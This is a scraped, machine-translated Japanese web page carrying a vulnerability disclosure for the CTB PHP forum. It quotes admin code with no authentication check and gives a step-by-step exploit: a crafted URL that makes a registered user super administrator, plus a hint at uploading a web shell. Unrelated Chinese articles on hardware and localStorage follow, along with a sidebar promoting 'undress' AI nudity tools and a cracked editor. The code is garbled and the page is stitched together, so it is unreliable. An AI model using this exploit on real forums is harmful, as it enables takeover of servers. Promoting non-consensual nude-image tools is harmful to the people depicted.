>>>このスクラップを CaoJing に捧げます
関係するバージョン:
^^^^^^
現在のすべてのバージョン (1.3Alpha が現在最高のバージョン)
説明:
^^^^^^
CTB は、Shiyi Digital によって開発および保守されているオープン ソースの PHP フォーラムです。バックグラウンド管理ファイルの検証に欠陥があるため、違法なユーザーがフォーラムのスーパー管理者を直接追加し、フォーラムやサーバーのセキュリティを脅かす可能性があります。
詳細:
^^^^
CTB は非常に標準的な書き方で、コードはよく整理されており、特に機能モジュールが美しいプログラムです。本当にたくさんのことを学びました。しかし、セキュリティ面が心配です:
次のコードを試してください:
/admin/main.php
~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
//get 変数を取得します
if( is_array($_GET) ) {
foreach($_GET as $k=>$v) {
if( is_array( $_GET[$k]) ) {
foreach($_GET[$k] as $k2=>$v2) {
$return[$k] = $v;
🎜>}
$mod = isset($_GET['mod']) ? : $_POST['mod'];
if (!file_exists( $mod.".php" {
$mod = "mainright";
}
require_once ($mod.".php ";
//---------- ---------------------------------- ---------------- ------------------
//クラス変数を初期化します
$ctb = 新しいモジュール;
$ctb->set = $set;
$ctb->tplPath = "./templates"; ctb->sess = isset($_COOKIE["sess_adminname"]) $_COOKIE : $_SESSION>~~~~~~~~~~; ~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~
ここでは検証がありません。追加するファイルを見てみましょう管理者:
/admin/systemuser.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~
class Module extends CommonClass
//システム管理モジュールのサブクラス
{
functionexecute() {
switch($this->input ['アクション']) {
...
case 'addSystemUser':
$this->addSystemUser();
...
} }
function add SystemUser()
{
//入力データの簡単なフォーマット
$this->inputCheck("main.php?mod=systemuser&action=showSystemUser";
/ /追加操作を実行します
$this->file = "../".$this->set[dataPath]."/users/list.php";
$systemLine = $this-> ;select(4, $this->input['systemUserName' ]);
....
~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~ ~~~~~~~
まだ検証されていません。良い旅を!
使い方:
^^^^^^^
まずはユーザー登録:
ログインID: cat
ユーザー名: Dog
パスワード: ilikecat
パスワードを繰り返します: ilikecat
メール: cat@dog.com
次に、次の URL を送信します:
http://www.target.com/ctb/admin/main . php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser
はは、あなたはスーパー管理者になりました、信じられませんか?バックエンドログイン用に次の URL を送信します:
http://www.psych.com/ctb/admin/main.php?mod=login
管理名: cat
管理パスワード: ilikecat
やあ...本当にうまくいきました!
今すぐバックグラウンドアップロードのファイルタイプを変更して、WebShell をアップロードしますか?うーん、やっぱり察しがつきましたね…
追記: CTB コードのコメントに明らかな誤字も見つけましたので、併せて修正していただければと思います。
如何在技嘉主板上设置键盘启动功能 (技嘉主板启用键盘开机方式)Dec 31, 2023 pm 05:15 PM技嘉的主板怎么设置键盘开机首先,要支持键盘开机,一定是PS2键盘!!设置步骤如下:第一步:开机按Del或者F2进入bios,到bios的Advanced(高级)模式普通主板默认进入主板的EZ(简易)模式,需要按F7切换到高级模式,ROG系列主板默认进入bios的高级模式(我们用简体中文来示范)第二步:选择到——【高级】——【高级电源管理(APM)】第三步:找到选项【由PS2键盘唤醒】第四步:这个选项默认是Disabled(关闭)的,下拉之后可以看到三种不同的设置选择,分别是按【空格键】开机、按组
CS玩家的首选:推荐的电脑配置Jan 02, 2024 pm 04:26 PM1.处理器在选择电脑配置时,处理器是至关重要的组件之一。对于玩CS这样的游戏来说,处理器的性能直接影响游戏的流畅度和反应速度。推荐选择IntelCorei5或i7系列的处理器,因为它们具有强大的多核处理能力和高频率,可以轻松应对CS的高要求。2.显卡显卡是游戏性能的重要因素之一。对于射击游戏如CS而言,显卡的性能直接影响游戏画面的清晰度和流畅度。建议选择NVIDIAGeForceGTX系列或AMDRadeonRX系列的显卡,它们具备出色的图形处理能力和高帧率输出,能够提供更好的游戏体验3.内存电
修复:任务栏溢出在 Windows 11 上不起作用Jul 18, 2023 am 09:41 AM当Windows11任务栏溢出功能停止工作时,用户将丢失重要的自定义选项。这是因为该功能允许您将尽可能多的应用程序添加到任务栏并轻松启动它们。虽然这个问题可能令人沮丧,但并不是最难解决的。在本综合指南中,我们准备了万无一失的方法,以使任务栏溢出功能再次正常工作。为什么任务栏溢出在Windows11上不起作用?正如用户报告的那样,有几个因素可能导致任务栏溢出在Windows11上不起作用。以下是一些值得注意的原因:过时的PC:过时的操作系统是此问题的主要原因。如果您使用高于Windows11预览体
广联达软件电脑配置推荐;广联达软件对电脑的配置要求Jan 01, 2024 pm 12:52 PM广联达软件是一家专注于建筑信息化领域的软件公司,其产品被广泛应用于建筑设计、施工、运营等各个环节。由于广联达软件功能复杂、数据量大,对电脑的配置要求较高。本文将从多个方面详细阐述广联达软件的电脑配置推荐,以帮助读者选择适合的电脑配置处理器广联达软件在进行建筑设计、模拟等操作时,需要进行大量的数据计算和处理,因此对处理器的要求较高。推荐选择多核心、高主频的处理器,如英特尔i7系列或AMDRyzen系列。这些处理器具有较强的计算能力和多线程处理能力,能够更好地满足广联达软件的需求。内存内存是影响计算
主板上的数字音频输出接口-SPDIF OUTJan 14, 2024 pm 04:42 PM主板上SPDIFOUT连接线序最近我遇到了一个问题,就是关于电线的接线顺序。我上网查了一下,有些资料说1、2、4对应的是out、+5V、接地;而另一些资料则说1、2、4对应的是out、接地、+5V。最好的办法是查看你的主板说明书,如果找不到说明书,你可以使用万用表进行测量。首先找到接地,然后就可以确定其他的接线顺序了。主板vdg怎么接线连接主板的VDG接线时,您需要将VGA连接线的一端插入显示器的VGA接口,另一端插入电脑的显卡VGA接口。请注意,不要将其插入主板的VGA接口。完成连接后,您可以
localstorage为什么不安全Oct 10, 2023 pm 05:38 PMlocalstorage不安全的原因是数据不加密、XSS攻击、CERF攻击、容量限制等。详细介绍:1、数据不加密,localstorage是一个简单的键值对存储系统,它将数据以明文形式存储在用户的浏览器中,这意味着任何人都可以轻松地访问和读取存储在localstorage中的数据,如果敏感信息存储在localstorage中,那么黑客或恶意用户可以轻松地获取这些信息等等。
Stable Diffusion XL 现已推出—有什么新功能,你知道吗?Apr 07, 2023 pm 11:21 PM3月27号,Stability AI的创始人兼首席执行官Emad Mostaque在一条推文中宣布,Stable Diffusion XL 现已可用于公开测试。以下是一些事项:“XL”不是这个新的AI模型的官方名称。一旦发布稳定性AI公司的官方公告,名称将会更改。与先前版本相比,图像质量有所提高与先前版本相比,图像生成速度大大加快。示例图像让我们看看新旧AI模型在结果上的差异。Prompt: Luxury sports car with aerodynamic curves, shot in a
请推荐一款性价比较高的1155针CPUJan 14, 2024 pm 01:30 PM求推荐1155针的cpu哪个最好当前性能最高的1155针CPU是IntelCorei7-3770K。它拥有4个核心和8个线程,基础频率为3.5GHz,并支持TurboBoost2.0技术,最高可达到3.9GHz。此外,它还搭载了8MB的三级缓存,是一款非常出色的处理器LGA1155针最强的CPUIntel酷睿i73770K。LGA1155接口为二三代酷睿处理器所使用的接口类型,性能最好的为Intel酷睿i73770K,这款处理器参数如下:1.适用类型:台式机;2.CPU系列:酷睿i7;3.CPU
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
AI Hentai Generator
AIヘンタイを無料で生成します。
人気の記事
ホットツール
Safe Exam Browser
Safe Exam Browser は、オンライン試験を安全に受験するための安全なブラウザ環境です。このソフトウェアは、あらゆるコンピュータを安全なワークステーションに変えます。あらゆるユーティリティへのアクセスを制御し、学生が無許可のリソースを使用するのを防ぎます。
DVWA
Damn Vulnerable Web App (DVWA) は、非常に脆弱な PHP/MySQL Web アプリケーションです。その主な目的は、セキュリティ専門家が法的環境でスキルとツールをテストするのに役立ち、Web 開発者が Web アプリケーションを保護するプロセスをより深く理解できるようにし、教師/生徒が教室環境で Web アプリケーションを教え/学習できるようにすることです。安全。 DVWA の目標は、シンプルでわかりやすいインターフェイスを通じて、さまざまな難易度で最も一般的な Web 脆弱性のいくつかを実践することです。このソフトウェアは、
SublimeText3 英語版
推奨: Win バージョン、コードプロンプトをサポート!
EditPlus 中国語クラック版
サイズが小さく、構文の強調表示、コード プロンプト機能はサポートされていません
SublimeText3 Linux 新バージョン
SublimeText3 Linux 最新バージョン
